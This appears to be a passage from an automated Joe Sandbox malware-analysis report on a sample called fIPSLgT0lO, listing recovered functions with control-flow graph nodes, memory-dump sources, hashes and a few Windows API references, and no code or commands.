                                                                                      control_flow_graph 2286 5ab1140-5ab114b 2287 5ab114d-5ab1153 2286->2287 2288 5ab1163-5ab1165 2286->2288 2289 5ab1157-5ab1161 2287->2289 2290 5ab1155 2287->2290 2291 5ab12c7-5ab12d2 2288->2291 2289->2288 2290->2288 2294 5ab116a-5ab116d 2291->2294 2295 5ab12d8-5ab12da 2291->2295 2298 5ab116f-5ab1171 2294->2298 2299 5ab11ae-5ab11b1 2294->2299 2296 5ab12f9-5ab12ff 2295->2296 2297 5ab12dc-5ab12f2 2295->2297 2300 5ab1303-5ab130f 2296->2300 2301 5ab1301 2296->2301 2297->2296 2305 5ab1173-5ab1189 2298->2305 2306 5ab1190-5ab1199 2298->2306 2302 5ab11eb-5ab11ee 2299->2302 2303 5ab11b3-5ab11b5 2299->2303 2307 5ab1311-5ab1316 2300->2307 2301->2307 2308 5ab11f0-5ab11f2 2302->2308 2309 5ab1227-5ab122a 2302->2309 2310 5ab11b7-5ab11cd 2303->2310 2311 5ab11d4-5ab11e6 2303->2311 2305->2306 2306->2291 2325 5ab119f-5ab11a1 2306->2325 2318 5ab1211-5ab1222 2308->2318 2319 5ab11f4-5ab120a 2308->2319 2315 5ab122c-5ab122e 2309->2315 2316 5ab1264-5ab1267 2309->2316 2310->2311 2311->2291 2323 5ab124d-5ab1256 2315->2323 2324 5ab1230-5ab1246 2315->2324 2320 5ab1269-5ab126b 2316->2320 2321 5ab129e-5ab12a0 2316->2321 2318->2291 2319->2318 2332 5ab128a-5ab129c 2320->2332 2333 5ab126d-5ab1283 2320->2333 2327 5ab12bf 2321->2327 2328 5ab12a2-5ab12b8 2321->2328 2323->2291 2340 5ab1258-5ab1262 2323->2340 2324->2323 2338 5ab11a9 2325->2338 2327->2291 2328->2327 2332->2291 2333->2332 2338->2291 2340->2291
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930811713.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ab0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$4'p
                                                                                      • API String ID: 0-3973980265
                                                                                      • Opcode ID: 0e282ddc24ec3b080d6d36919d50c3fece8e97a9c67ad12866a16b2db968cf62
                                                                                      • Instruction ID: bd43d9b336fe4cd4f2c63680e8a7560877f84cfafa7bad0df66c65204e1539b3
                                                                                      • Opcode Fuzzy Hash: 0e282ddc24ec3b080d6d36919d50c3fece8e97a9c67ad12866a16b2db968cf62
                                                                                      • Instruction Fuzzy Hash: 00418B70B21525479F2A67796028DBE299BFBD5A60B14016EC907E7395EFB4CC0283C6
                                                                                      Function 05BA79E2 Relevance: 2.6, Strings: 2, Instructions: 120COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2351 5ba79e2-5ba7a54 2355 5ba7a5a-5ba7a6c 2351->2355 2356 5ba7bd2-5ba7c3e 2351->2356 2359 5ba7a6e-5ba7aba 2355->2359 2360 5ba7abc-5ba7b05 2355->2360 2368 5ba7e8d-5ba7e94 2356->2368 2369 5ba7c44-5ba7c4d 2356->2369 2392 5ba7b08-5ba7b1c 2359->2392 2360->2392 2372 5ba7c4f-5ba7c53 2369->2372 2373 5ba7cc3-5ba7cdc 2369->2373 2376 5ba7c6c-5ba7c78 2372->2376 2377 5ba7c55-5ba7c6a 2372->2377 2386 5ba7e09-5ba7e19 2373->2386 2387 5ba7ce2 2373->2387 2378 5ba7c81-5ba7cbe 2376->2378 2377->2378 2378->2368 2399 5ba7e1b-5ba7e30 2386->2399 2400 5ba7e32-5ba7e3e 2386->2400 2388 5ba7ce9-5ba7d2c 2387->2388 2389 5ba7d79-5ba7dbc 2387->2389 2390 5ba7d31-5ba7d74 2387->2390 2391 5ba7dc1-5ba7e04 2387->2391 2388->2368 2389->2368 2390->2368 2391->2368 2394 5ba7b27-5ba7b48 2392->2394 2406 5ba7b4a-5ba7b50 2394->2406 2407 5ba7b52-5ba7b5c 2394->2407 2401 5ba7e47-5ba7e88 2399->2401 2400->2401 2401->2368 2408 5ba7b5f-5ba7ba2 2406->2408 2407->2408 2415 5ba7bc8-5ba7bcf 2408->2415 2416 5ba7ba4-5ba7bc0 2408->2416 2416->2415
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p$pp
                                                                                      • API String ID: 0-276496374
                                                                                      • Opcode ID: ffd0d8913ce04bf8b77c924cfc2ae0777a0549fdd52f61c15d9cd33b9d5c67c2
                                                                                      • Instruction ID: d864c6d062806a301f9d41fa476139b8d3967f986c2559c38ebc94af0ee2399b
                                                                                      • Opcode Fuzzy Hash: ffd0d8913ce04bf8b77c924cfc2ae0777a0549fdd52f61c15d9cd33b9d5c67c2
                                                                                      • Instruction Fuzzy Hash: C441D271A043059FC705DF68C8507AEBBB6FF88300F54856DC4059B365DBB1ED468BA0
                                                                                      Function 05BA3080 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (_p
                                                                                      • API String ID: 0-2702063464
                                                                                      • Opcode ID: 43706d09717a2a5588f3b18faca3d3c791803673ca2f5ea26593466c4f1fe6b4
                                                                                      • Instruction ID: f22151625ac5fef671c11bc8a69abc4106fc27c5ce6ffcde6e1d946bcaad356f
                                                                                      • Opcode Fuzzy Hash: 43706d09717a2a5588f3b18faca3d3c791803673ca2f5ea26593466c4f1fe6b4
                                                                                      • Instruction Fuzzy Hash: DF228E76B042059FDB04CF69D494AADBBF2FF88310F148499E9069B3A5DB75EC81CB90
                                                                                      Function 05BC2738 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 09bfaed237ab643fac15209e4bfdf6c44fb48186d892cc8016cd3a5516866fd6
                                                                                      • Instruction ID: cbf4439651c6b5deea7bb2622101159e299a64ab86e8e247d39e364529b9f1c1
                                                                                      • Opcode Fuzzy Hash: 09bfaed237ab643fac15209e4bfdf6c44fb48186d892cc8016cd3a5516866fd6
                                                                                      • Instruction Fuzzy Hash: 71515938A09204CFDB14CB24D484BB9BBB3FB48315F1444FEE0869B654CB79AD81CB59
                                                                                      Function 05BA4980 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $p
                                                                                      • API String ID: 0-982128392
                                                                                      • Opcode ID: 2c0c523c4faa4be6ff30c7814c18cd9bf21bd3345d7704465e5c84d22902963e
                                                                                      • Instruction ID: e9d12930ceac4cfc88ae30f8ecad59e7bf50541c4c008f07a1dbfa13c758322d
                                                                                      • Opcode Fuzzy Hash: 2c0c523c4faa4be6ff30c7814c18cd9bf21bd3345d7704465e5c84d22902963e
                                                                                      • Instruction Fuzzy Hash: E9E1D2727082428FDF199F69C441ABEBBF2FF98200F5448AAE552CB395DB75EC418711
                                                                                      Function 05BC283B Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2931027476.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5bc0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e7f2763a9a589a7f63e08083a77df710fd61de89d598882afb1b04047327dd18
                                                                                      • Instruction ID: b5d49287eee04f7466b7a7ea5c0ec08d7d0ab9a8054093fadaec7dee662bc2a8
                                                                                      • Opcode Fuzzy Hash: e7f2763a9a589a7f63e08083a77df710fd61de89d598882afb1b04047327dd18
                                                                                      • Instruction Fuzzy Hash: E7413D38A09205CFEB14CB14D595BB9BFB2FF48305F1504EAE4829B6A4CB75BD81CB19
                                                                                      Function 0197F6D8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 0197F74C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2928114863.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1970000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: a287dfcc5ccfb43d244b39c180a163ac78c2ddf50b3d506c345e84cbf24bb589
                                                                                      • Instruction ID: 5cc1b74869ca0b8c375d097dfc7d2a3d7e76c50c1e498973542846e41cb1c05d
                                                                                      • Opcode Fuzzy Hash: a287dfcc5ccfb43d244b39c180a163ac78c2ddf50b3d506c345e84cbf24bb589
                                                                                      • Instruction Fuzzy Hash: 6B11F4719003499FDB20DFAAC884BAEFBF5FF48324F10842AD459A7250C7799945CFA1
                                                                                      Function 05BA99C0 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,p
                                                                                      • API String ID: 0-2091407873
                                                                                      • Opcode ID: c81d59f33421a689ad1b79ec1076d658a6ecb1a9fcf52638495d4644e8f7d954
                                                                                      • Instruction ID: 02d72e6ceac86ee1c991efd29302950b34a95afddf162fcd44e323cd2e02239d
                                                                                      • Opcode Fuzzy Hash: c81d59f33421a689ad1b79ec1076d658a6ecb1a9fcf52638495d4644e8f7d954
                                                                                      • Instruction Fuzzy Hash: F1E1C375A002298FCB64DF69C981BDDBBF2BB88300F5441E9D549A7361DB30AE81DF61
                                                                                      Function 05BA83F2 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: d665bd9d2185bc00d4f442039719cbcdb2acce8e98f9a6caf0715cbac744baa3
                                                                                      • Instruction ID: 953a43e3b4b2f2a16dc20199d94ddd21dad2688695de66f86885a9d17fd8920f
                                                                                      • Opcode Fuzzy Hash: d665bd9d2185bc00d4f442039719cbcdb2acce8e98f9a6caf0715cbac744baa3
                                                                                      • Instruction Fuzzy Hash: D9A1DB35A14218DFCB08EFA4D898AADBBB2FF89300F558559E405AB765DF70EC42CB40
                                                                                      Function 05BAA520 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p
                                                                                      • API String ID: 0-4175582459
                                                                                      • Opcode ID: 082015942fcfb07984930ece44a850601cd3bc698b4be1c3a663a409f4bb04cf
                                                                                      • Instruction ID: 594afaf18c2944baf6e57c48c7a30d7939760c581a9fc67b79db52f1e7ab2204
                                                                                      • Opcode Fuzzy Hash: 082015942fcfb07984930ece44a850601cd3bc698b4be1c3a663a409f4bb04cf
                                                                                      • Instruction Fuzzy Hash: 544101327081518FDB559F39C854A6E7BEAFFD8600B1940A9E946CB3A1CE34ED02CB64
                                                                                      Function 05BAD7D9 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: a0cbd39f6a8426b0f4d68c1229bc42ff585562acf41b062016c04bad7485e839
                                                                                      • Instruction ID: d11bd1a3028e4529f56980da014ac46ca10267d48dde725bd49f0dec261b0300
                                                                                      • Opcode Fuzzy Hash: a0cbd39f6a8426b0f4d68c1229bc42ff585562acf41b062016c04bad7485e839
                                                                                      • Instruction Fuzzy Hash: C8417131B146149FCB04AB64C498ABEB7BBEFC8700F50456AE4069B7A4DF74AC46CB91
                                                                                      Function 05BAFD00 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: 999409e4605980dd6e8b601e38b7839b5f18d4a31e1bc8d42db01c736cadcaf3
                                                                                      • Instruction ID: a762e028d8a44f0b0c8d5e6d29e1d785e4baf53a5e98b3e01964743062429767
                                                                                      • Opcode Fuzzy Hash: 999409e4605980dd6e8b601e38b7839b5f18d4a31e1bc8d42db01c736cadcaf3
                                                                                      • Instruction Fuzzy Hash: 77312A367006109FD308EB68C859F2B77EAEBC8700F1445A8E60A8F3A5DE71EC42C790
                                                                                      Function 05BAFCF2 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: a703d6d1ea4a11c38437e6cca116d9fac07179dc5f70a0b61663629ab388e05f
                                                                                      • Instruction ID: befa6867e5b25863e0a924393aa86b3a562d344ec7d23da9c392e3ad137bec19
                                                                                      • Opcode Fuzzy Hash: a703d6d1ea4a11c38437e6cca116d9fac07179dc5f70a0b61663629ab388e05f
                                                                                      • Instruction Fuzzy Hash: D3315C767006109FD309DB68C959F2B77EAAFC8700F1445A8E60A8F3A5DE75EC42CB90
                                                                                      Function 05AB0000 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930811713.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ab0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: f03d54b4586551d9f0f5a6df9fbbac257e7778f45eed3667cbc5b2c473a57b83
                                                                                      • Instruction ID: a7e75fa8b7c352e4e93352f2682fa1055b85822832040ff67cf23c5fc7ca9f38
                                                                                      • Opcode Fuzzy Hash: f03d54b4586551d9f0f5a6df9fbbac257e7778f45eed3667cbc5b2c473a57b83
                                                                                      • Instruction Fuzzy Hash: 1021916550E7C05FD71347349C2AAA67F75BF43111B0E44EBC881CB5A3E5684D06C7A2
                                                                                      Function 05BA7872 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'p
                                                                                      • API String ID: 0-481844870
                                                                                      • Opcode ID: 4f3f63a917efa237b85f8d1e69f006e96404a8be8ccb83de3c2807438bc323bc
                                                                                      • Instruction ID: 5ff13fde6f81d00e3168e8ae1fa1e2920983494413901600daa186d710ab6cd0
                                                                                      • Opcode Fuzzy Hash: 4f3f63a917efa237b85f8d1e69f006e96404a8be8ccb83de3c2807438bc323bc
                                                                                      • Instruction Fuzzy Hash: 7E217132B04201AFCF188F94D898E5DBBB6FF8C310B1540A9E606AB365DB31DC56CB94
                                                                                      Function 05BA23D8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p<p
                                                                                      • API String ID: 0-2671882351
                                                                                      • Opcode ID: d7ea912b3b69d90e7a4da1d83a5825604a13b60db6c3dfb03a49b36660568353
                                                                                      • Instruction ID: 147065afdf2fefbbd88536d274b7782803698a7787c39907d70ee510e3fdc7c2
                                                                                      • Opcode Fuzzy Hash: d7ea912b3b69d90e7a4da1d83a5825604a13b60db6c3dfb03a49b36660568353
                                                                                      • Instruction Fuzzy Hash: 69213A35308295AFCB15CF2AC844AAABBEAFF89300B054095FD55CB361CA35EC91CB60
                                                                                      Function 05BA23C7 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p<p
                                                                                      • API String ID: 0-2671882351
                                                                                      • Opcode ID: 46f34ff6613fe4df9ba5a289b06d3729e78963f7c8862d531bf0914c63805f8f
                                                                                      • Instruction ID: c51dcd46a01cd5f9602a1c3b19d4d1241b69fbf9bf7e1ba7d633f90b1162b35d
                                                                                      • Opcode Fuzzy Hash: 46f34ff6613fe4df9ba5a289b06d3729e78963f7c8862d531bf0914c63805f8f
                                                                                      • Instruction Fuzzy Hash: 43216D7A308655AFCB05CF29C844AAABBEAFF89350B054095FD15DB3A0DA35EC51CB20
                                                                                      Function 05BAE900 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (p
                                                                                      • API String ID: 0-4175582459
                                                                                      • Opcode ID: be33e13bd9ff7886f97ad63037bba6741341246f1ac33511b8464d4b77eee934
                                                                                      • Instruction ID: fa78a44452f610519986c0d62dfab5fc15626c709cbf653c1eff462503361815
                                                                                      • Opcode Fuzzy Hash: be33e13bd9ff7886f97ad63037bba6741341246f1ac33511b8464d4b77eee934
                                                                                      • Instruction Fuzzy Hash: 6A11B9726191509FDB46CF64D814C697FB6FF8921030A80DAE505DB372C635DC15DB51
                                                                                      Function 0197F888 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2928114863.0000000001970000.00000040.00000800.00020000.00000000.sdmp, Offset: 01970000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1970000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 27d220df0bd2e503244c06c94bdbf0d7357273f2691f40bd7a7444d78fd49cac
                                                                                      • Instruction ID: 33b884677d0a51bcb1df20a982c9dfed2d4e89d3331500f18499856828263f1a
                                                                                      • Opcode Fuzzy Hash: 27d220df0bd2e503244c06c94bdbf0d7357273f2691f40bd7a7444d78fd49cac
                                                                                      • Instruction Fuzzy Hash: 41112871D003498FDB20DFAAC8457AEFBF9AF88324F208819D559A7250CA79A945CB94
                                                                                      Function 05BADA28 Relevance: .4, Instructions: 437COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1d4fe4585feae6de9b4bf1ce00046125ba0ed5216965a92fdd301a3c6c42780
                                                                                      • Instruction ID: 79f781bef6c988ed315a800b37959b1adb7c34d1f796a6b40e963a61d28bea14
                                                                                      • Opcode Fuzzy Hash: f1d4fe4585feae6de9b4bf1ce00046125ba0ed5216965a92fdd301a3c6c42780
                                                                                      • Instruction Fuzzy Hash: B712FA35B142198FCB14EF64C894A9DBBB2FF89300F5185A8E44AAB765DF70ED85CB40
                                                                                      Function 05A84970 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930672241.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2930414690.00000000059C0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_59c0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e3d31f6bc7285e8c8b9f45b0b8a5e9fe27960b16924d686ca7d6f40568095e0d
                                                                                      • Instruction ID: c689672cb7dcc82ffa62095f61c56d75475d1cb7e4a0452ad9093535c01a5b2d
                                                                                      • Opcode Fuzzy Hash: e3d31f6bc7285e8c8b9f45b0b8a5e9fe27960b16924d686ca7d6f40568095e0d
                                                                                      • Instruction Fuzzy Hash: DCA189706042059FCB14EF69D594F6ABBFAFF88304F1581A9E4069B3A5DB75EC02CB90
                                                                                      Function 05BADA18 Relevance: .2, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ecd5187b0a8ccf451017c0bba2572a2a2252e83fd7376f8007d514a7e7712ba
                                                                                      • Instruction ID: 003d083f448d0574b6c3c249415475647b48510f010e128639b63c447e229660
                                                                                      • Opcode Fuzzy Hash: 4ecd5187b0a8ccf451017c0bba2572a2a2252e83fd7376f8007d514a7e7712ba
                                                                                      • Instruction Fuzzy Hash: AEA1F635B042148FCB14DF24C898BA9BBB2BF88300F5585A8E54AAB365DF71ED85CF40
                                                                                      Function 05BA24FB Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3d96e1e4ba29fafd39c36df4064d1acc6c44e70b5a42c53165bdc2af67fe68ef
                                                                                      • Instruction ID: 2b5b8ce164a071456c6df1c71435628e8c9575baacec25b35e011cef033e8675
                                                                                      • Opcode Fuzzy Hash: 3d96e1e4ba29fafd39c36df4064d1acc6c44e70b5a42c53165bdc2af67fe68ef
                                                                                      • Instruction Fuzzy Hash: 87A15B36E0461A9FCF11CFA5D441AFEFBB1FB48700F148195E851A7284DB39AE06CBA0
                                                                                      Function 05BA54E8 Relevance: .2, Instructions: 208COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 95f11d37d0a17f01349c2ef5e5527f88ca154998d2ca4276088f3c37b8a404c9
                                                                                      • Instruction ID: ced554ebd5aa23dca89035a724ade77667caa1fbc416e386109b84f81b11dfbe
                                                                                      • Opcode Fuzzy Hash: 95f11d37d0a17f01349c2ef5e5527f88ca154998d2ca4276088f3c37b8a404c9
                                                                                      • Instruction Fuzzy Hash: CF810935A04614CFCB25DF68C484A9DBBF6FF88350B1585A9E816AB360DB30FD42CB90
                                                                                      Function 05BAEE00 Relevance: .2, Instructions: 207COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2930991237.0000000005BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5ba0000_fIPSLgT0lO.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b36f2099034d4744ecc56b4620d82a76681c8383acee51bbe8b9fe7f9dc147af
                                                                                      • Instruction ID: f3ba2801eec02595ab3d410548810564da9a2b9b3f2df57c6cbc496917f45cdc
                                                                                      • Opcode Fuzzy Hash: b36f2099034d4744ecc56b4620d82a76681c8383acee51bbe8b9fe7f9dc147af
                                                                                      • Instruction Fuzzy Hash: 33815D35B146049FCB14EF68C458AADB7B6FF88300F1085A9E4029B7A1DB75EC86CB90
                                                                                      Function 05BAE9C0 Relevance: .2, Instructions: 195COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
